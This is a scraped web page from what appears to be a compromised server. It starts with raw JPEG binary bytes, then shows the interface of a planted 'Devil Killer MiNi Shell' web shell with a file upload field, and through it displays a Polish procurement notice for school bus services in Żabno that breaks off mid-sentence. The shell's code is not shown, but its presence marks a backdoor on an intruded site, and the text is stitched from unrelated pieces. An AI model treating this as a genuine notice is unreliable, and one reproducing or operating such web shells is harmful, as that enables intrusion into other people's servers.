JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211212/0031077802-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług transportowych w zakresie dowozu uczniów w 2022 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Obsługi Samorządowych Szkół i Przedszkoli w Żabnie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 850400804</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żabno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-240</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zossip@zabno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.malopolska.pl/zossiprzedszkoli</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samorządowy zakład budżetowy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług transportowych w zakresie dowozu uczniów w 2022 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b87c6fd3-5b1b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00310778</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/umwzabno,m,342454,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,https://epuap.gov.pl/wps/portal, zossip@zabno.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/,ePUAPu,dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej. 2) Zamawiający przewiduje komunikację pomiędzy Zamawiającym a Wykonawcą za pomocą poczty elektronicznej: a) w sprawach dotyczących przedmiotu zamówienia - Maksymilian Żołądź<br/>tel. +48/14 645 63 87, e-mail: zossip@zabno.pl 3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub<br/>wniosku” oraz do„Formularza do komunikacji”. 4) Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu<br/>miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej<br/>(ePUAP). 5) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy:<br/>„Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150<br/>MB. 6) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP. 7) Zamawiający przekazuje link do postępowania oraz ID postępowania jako<br/>załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania. 8) Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki dowodowe, ,pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w<br/>postaci elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej lub podpisem osobistym w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf,.pdf, .doc, .docx, .odt.. 9) Wykonawcy w korespondencji kierowanej do<br/>Zamawiającego powinni posługiwać się numerem przedmiotowego postępowania (znakiem sprawy). W zakresie nie wymienionym powyżej zastosowanie mają zapisy SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a) Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.b) Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Świadczenie usług transportowych w zakresie dowozu uczniów w 2022 roku&#34;<br/>c) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej. d) Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie<br/>udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej. e) Dane osobowe wykonawcy<br/>zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy.f) Klauzula informacyjna, o której mowa w art. 13 ust. 1 i 2 RODO znajduje się Informacji nt. RODO - załącznik nr 10 do SWZ.g) Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane<br/>osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych<br/>stosownych informacji, o których mowa w art. 13 ust. 2 RODO.h) Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:- obowiązek informacyjny<br/>przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub<br/>dokumentów składanych na żądanie zamawiającego;- obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to<br/>dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego. i) W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 5 do SWZ. Sposób i zasady udostępnienia danych osobowych określają zapisy SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOSSiP.271.1.21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> a)	Część 1 pn. „Trasa I ”<br/>	Przedmiotem zamówienia w tej części jest wykonanie usługi transportowej autobusem na trasie Łęg Tarnowski ul. Zamościa, k/kościoła Zamościa poprzez Łęg Dolny ul. Sportowa, ul. Rudno, ul. Tarnowska, ul. Partyń, ul. Przedmieścia, ul. Tarnowska, ul. Warzały, ul. Kolejowa, ul. Krótka, ul. Witosa - SP Łęg Tarnowski, SP Łęg Tarnowski – ul. Dąbrowska koło sklepu – SP Łęg Tarnowski <br/>	liczba dzieci przewidzianych do dowozu wynosi – 45, <br/>	łączna ilość kilometrów przewidzianych do przejechania (jednorazowy przejazd) - 30,6 km, <br/>	liczba planowanych przystanków – 17 (lokalizacja przystanków zostanie przekazana Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy),<br/>	Liczba dni dowozu dzieci w tym okresie wynosi 187.<br/>3)	Wykonawca musi zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, w szczególności zgodnie z obowiązującymi wytycznymi służb sanitarnych, w związku z zapobieganiem rozprzestrzeniania się pandemii COVID-19.<br/>4)	W każdym autobusie, na każdej trasie, Wykonawca zobowiązany jest do zapewnienia co najmniej jednej osoby sprawującej opiekę wychowawczą nad przewożonymi uczniami. <br/>5)	Do obowiązku osoby sprawującej opiekę wychowawczą nad uczniami będzie należało:<br/>a)	sprawdzanie stanu liczbowego uczniów wewnątrz pojazdu,<br/>b)	pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w autobusie,<br/>c)	ustalenie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>d)	zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,<br/>e)	zapewnienie bezpiecznego wsiadania, wysiadania z pojazdu,<br/>f)	w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów nie dopuszczenie do ich przewozu.<br/>6)	Wykonawca określi w formularzu ofertowym ryczałtową cenę brutto za 1 km wykonania dowozu oraz całkowitą szacunkową cenę za realizację danej części zamówienia na którą składa ofertę, ustaloną zgodnie ze wzorem określonym <br/>w Rozdziale II ust. 12 SWZ. Zamawiający wymaga od Wykonawcy podania ceny za realizację poszczególnych części zamówienia.<br/>7)	Wykonawca może przewozić tylko dzieci z terenu Gminy Żabno wskazane przez Zakład Obsługi Samorządowych Szkół i Przedszkoli w Żabnie – nie dopuszcza się przewozów łączonych.<br/><br/>UWAGA!<br/> Dla poszczególnych tras podano ilość efektywnych przejechanych kilometrów, tj. kilometrów kiedy przewożone są dzieci. Nie uwzględniono kilometrów „pustego przebiegu”, tj. przejazdu bez dzieci.<br/><br/>8)	W trakcie realizacji zamówienia Wykonawca zobowiązany jest używać wyłącznie pojazdów, które są dopuszczone do ruchu zgodnie z obowiązującymi przepisami prawa, posiadają ważne badania techniczne oraz ubezpieczenia OC i NNW, jak również przystosowane są do przewozu osób.<br/>9)	Wykonawca w celu zapewnienia sprawności technicznej pojazdów, zobowiązany jest przestrzegać przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r., poz. 2022).<br/>10)	W przypadku awarii autobusu Wykonawca zobowiązany jest do podstawienia autobusu zastępczego będącego w dyspozycji wykonawcy, w czasie nie dłuższym niż 60 minut od wystąpienia awarii.<br/>11)	Dokumenty wymienione w ust. 8 Wykonawca udostępni Zamawiającemu na każde jego wezwanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium termin płatności wynagrodzenia (Pt):<br/> <br/>Wykonawca który zadeklaruje w ofercie: <br/>a)	Termin płatności wynagrodzenia - 30 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 40 punktów,<br/>b)	Termin płatności wynagrodzenia - 21 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 20 punktów.<br/>c)	Termin płatności wynagrodzenia - 14 dni od dostarczenia Zamawiającemu prawidłowo wystawionej faktury – otrzyma 0 punktów.<br/><br/><br/>Zamawiający informuje, iż za najdłuższy realny okres gwarancji jakości przyjmuje okres 60 miesięcy. <br/>Minimalny natomiast wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy. <br/><br/>c)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pt, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium cena <br/>Pt - liczba punktów uzyskanych w termin płatności wynagrodzenia <br/><br/>3)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4)	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności wynagrodzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> b)	Część 2 pn. „Trasa II”<br/>	Przedmiotem zamówienia w tej części jest wykonanie usługi transportowej autobusem na trasie Podlesie Dębowe (przystanek), ul. Warszawska , ul. Kościuszki: przystanek Garbarz, przystanek koło cmentarza– zatoka byłego gimnazjum w Żabnie <br/>	liczba dzieci przewidzianych do dowozu - 20, <br/>	łączna ilość kilometrów przewidzianych do przejechania (jednorazowy przejazd)- 9,2km,<br/>	Liczba dni dowozu dzieci w tym okresie wynosi 187.<br/>3)	Wykonawca musi zapewnić uczniom bezpieczny przewóz tzn. odpowiednie warunki bezpieczeństwa i higieny, w szczególności zgodnie z obowiązującymi wytycznymi służb sanitarnych, w związku z zapobieganiem rozprzestrzeniania się pandemii COVID-19.<br/>4)	W każdym autobusie, na każdej trasie, Wykonawca zobowiązany jest do zapewnienia co najmniej jednej osoby sprawującej opiekę wychowawczą nad przewożonymi uczniami. <br/>5)	Do obowiązku osoby sprawującej opiekę wychowawczą nad uczniami będzie należało:<br/>a)	sprawdzanie stanu liczbowego uczniów wewnątrz pojazdu,<br/>b)	pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w autobusie,<br/>c)	ustalenie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>d)	zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,<br/>e)	zapewnienie bezpiecznego wsiadania, wysiadania z pojazdu,<br/>f)	w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów nie dopuszczenie do ich przewozu.<br/>6)	Wykonawca określi w formularzu ofertowym ryczałtową cenę brutto za 1 km wykonania dowozu oraz całkowitą szacunkową cenę za realizację danej części zamówienia na którą składa ofertę, ustaloną zgodnie ze wzorem określonym <br/>w Rozdziale II ust. 12 SWZ. Zamawiający wymaga od Wykonawcy podania ceny za realizację poszczególnych części zamówienia.<br/>7)	Wykonawca może przewozić tylko dzieci z terenu Gminy Żabno wskazane przez Zakład Obsługi Samorządowych Szkół i Przedszkoli w Żabnie – nie dopuszcza się przewozów łączonych.<br/><br/>UWAGA!<br/> Dla poszczególnych tras podano ilość efektywnych przejechanych kilometrów, tj. kilometrów kiedy przewożone są dzieci. Nie uwzględniono kilometrów „pustego przebiegu”, tj. przejazdu bez dzieci.<br/><br/>8)	W trakcie realizacji zamówienia Wykonawca zobowiązany jest używać wyłącznie pojazdów, które są dopuszczone do ruchu zgodnie z obowiązującymi przepisami prawa, posiadają ważne badania techniczne oraz ubezpieczenia OC i NNW, jak również przystosowane są do przewozu osób.<br/>9)	Wykonawca w celu zapewnienia sprawności technicznej pojazdów, zobowiązany jest przestrzegać przepisów określonych w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 roku w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r., poz. 2022).<br/>10)	W przypadku awarii autobusu Wykonawca zobowiązany jest do podstawienia autobusu zastępczego będącego w dyspozycji wykonawcy, w czasie nie dłuższym niż 60 minut od wystąpienia awarii.<br/>11)	Dokumenty wymienione w ust. 8 Wykonawca udostępni Zamawiającemu na każde jego wezwanie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2)	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium cena (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium termin płatności wynagrodzenia (Pt):<br/> <br/>Wykonawca który zadeklaruje w ofercie: <br/>a)	Termin płatności 